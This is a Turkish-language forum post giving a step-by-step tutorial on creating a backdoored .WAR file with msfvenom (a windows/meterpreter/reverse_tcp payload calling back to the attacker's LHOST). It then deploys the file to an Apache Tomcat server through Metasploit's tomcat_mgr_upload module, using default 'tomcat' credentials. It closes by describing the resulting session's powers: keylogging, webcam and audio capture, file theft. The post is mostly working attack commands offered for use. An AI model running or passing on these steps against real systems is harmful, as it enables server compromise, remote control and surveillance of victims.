Hoşgeldin Misafir

Metasploit Kullanarak backdoor özelliği olan .WAR Dosyası

Mustafa73

20 Eyl 2023
423 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kullanılacak araçlar:
Msfvenum
Msfvenom, payload oluşturma ve kodlama işlemlerini birleştiren bir araçtır. Msfvenom aracını kullanarak .WAR dosyası oluşturmak için aşağıdaki adımları takip edebilirsiniz:

1. Adım: Msfvenom aracının kullanımını ve desteklediği seçenekleri görmek için -h veya --help parametresini kullanın. Örneğin:
root@kali:~# msfvenom -h

2. Adım: Msfvenom aracı ile kullanabileceğiniz payloadları görmek için -l veya --list parametresini kullanın. Payloadlar, hedef sisteme gönderilecek olan kötü amaçlı kod parçalarıdır. Örneğin:
root@kali:~# msfvenom -l payloads

3. Adım: Reverse_tcp payloadunu kullanarak ajanınızı oluşturmak istediğinizi varsayalım. Bu ajan çalıştırıldığında, sizin yerel makinenize bir ters bağlantı kuracaktır. Bu bağlantı için kullanacağınız IP adresini ve port numarasını belirtmeniz gerekir. Bunun için -p veya --payload parametresini kullanabilirsiniz. Örneğin:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444

4. Adım: Oluşturduğunuz payloadun çıktı formatını belirlemeniz gerekir. Bu, payloadun nasıl görüneceğini ve nasıl çalıştırılacağını etkiler. .WAR dosyası oluşturmak istiyorsanız, -f veya --format parametresini war olarak belirtmeniz gerekir. Örneğin:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f war

5. Adım: Oluşturduğunuz .WAR dosyasını kaydetmek istiyorsanız, -o veya --out parametresini kullanarak bir dosya adı belirleyebilirsiniz. Örneğin:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f war -o test.war
Bu şekilde, test.war isimli bir dosya oluşturmuş olursunuz. Bu dosyayı, Java ile geliştirilmiş bir web uygulamasına yükleyerek, hedef sisteme sızabilirsiniz. Bunun için, hedef sistemin Apache Tomcat sunucusunun zafiyetli olduğunu veya yönetici erişimine sahip olduğunuzu varsayalım. Aşağıdaki adımları takip ederek, .WAR dosyasını yükleyebilirsiniz.

6. Adım: Metasploit konsolunu açın ve exploit/multi/http/tomcat_mgr_upload modülünü kullanın. Bu modül, Apache Tomcat sunucusuna .WAR dosyası yüklemenizi sağlar. Örneğin:
root@kali:~# msfconsole
msf > use exploit/multi/http/tomcat_mgr_upload

7. Adım: Modülün gerektirdiği seçenekleri ayarlayın. Bunlar, hedef sistemin IP adresi, port numarası, yönetici kullanıcı adı ve şifresi, yükleyeceğiniz .WAR dosyasının yolu ve payloadunuzun platformu ve mimarisidir. Örneğin:
msf exploit(multi/http/tomcat_mgr_upload) > set RHOST 192.168.2.2
msf exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set WARFILE /root/test.war
msf exploit(multi/http/tomcat_mgr_upload) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/http/tomcat_mgr_upload) > set LHOST 192.168.2.1
msf exploit(multi/http/tomcat_mgr_upload) > set LPORT 4444

8. Adım: Modülü çalıştırın ve hedef sisteme bağlanmayı bekleyin. Örneğin:
msf exploit(multi/http/tomcat_mgr_upload) > exploit
Eğer her şey yolunda giderse, hedef sisteme bir meterpreter oturumu açılacaktır. Bu oturumda, hedef sistemi kontrol edebilir, dosya indirebilir veya yükleyebilir, ekran görüntüsü alabilir, klavye tuşlarını izleyebilir, web kamerasını açabilir, ses kaydedebilir ve daha birçok işlem yapabilirsiniz. Meterpreter oturumunun komutlarını görmek için help komutunu kullanabilirsiniz. Örneğin:
meterpreter > help
Bu şekilde, Metasploit kullanarak backdoor özelliği olan .WAR dosyası oluşturma ve Apache Tomcat sunucusunu exploit etme işlemlerini gerçekleştirmiş olursunuz.